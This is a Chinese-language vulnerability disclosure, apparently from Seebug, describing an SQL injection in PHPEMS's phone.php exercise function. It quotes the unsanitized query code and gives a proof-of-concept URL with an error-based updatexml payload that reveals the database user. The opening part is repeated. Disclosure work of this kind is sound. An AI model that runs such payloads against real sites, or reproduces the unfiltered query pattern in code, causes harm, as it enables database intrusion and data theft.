### 简要描述: PHPEMS一处SQL注入漏洞 ### 详细说明: 8.PHPEMS某处SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/phone.php的exercise()函数中 具体存在漏洞地方位于239行附近 $numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'],$knowids))); 这里getQuestionNumberByQuestypeAndKnowsid第二个参数$knowids是完全可控的 进入函数内部 public function getQuestionNumberByQuestypeAndKnowsid($questype,$knowsid) { if(!$knowsid)$knowsid = '0'; $data = array("count(*) AS number",array('questions','quest2knows'),array("questions.questiontype = '{$questype}'","questions.questionparent = 0","questions.questionstatus = 1","questions.questionid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 0"),false,false,false); $sql = $this->sql->makeSelect($data); $r = $this->db->fetch($sql); $data = array("sum(qrnumber) AS number",array('questionrows','quest2knows'),array("questionrows.qrtype = '{$questype}'","questionrows.qrstatus = 1","questionrows.qrid =...
### 简要描述: PHPEMS一处SQL注入漏洞 ### 详细说明: 8.PHPEMS某处SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/phone.php的exercise()函数中 具体存在漏洞地方位于239行附近 $numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'],$knowids))); 这里getQuestionNumberByQuestypeAndKnowsid第二个参数$knowids是完全可控的 进入函数内部 public function getQuestionNumberByQuestypeAndKnowsid($questype,$knowsid) { if(!$knowsid)$knowsid = '0'; $data = array("count(*) AS number",array('questions','quest2knows'),array("questions.questiontype = '{$questype}'","questions.questionparent = 0","questions.questionstatus = 1","questions.questionid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 0"),false,false,false); $sql = $this->sql->makeSelect($data); $r = $this->db->fetch($sql); $data = array("sum(qrnumber) AS number",array('questionrows','quest2knows'),array("questionrows.qrtype = '{$questype}'","questionrows.qrstatus = 1","questionrows.qrid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 1"),false,false,false); $sql = $this->sql->makeSelect($data); $m = $this->db->fetch($sql); return $r['number']+$m['number']; } 没有进行任何过滤就参与SQL语句整合了,于是产生了SQL注入漏洞 验证过程 注册用户,登录之 访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1) 即可验证。 [<img src="https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png" alt="fff.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png) 验证无误 ### 漏洞证明: 注册用户,登录之 访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1) 即可验证。 [<img src="https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png" alt="fff.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png) 验证无误
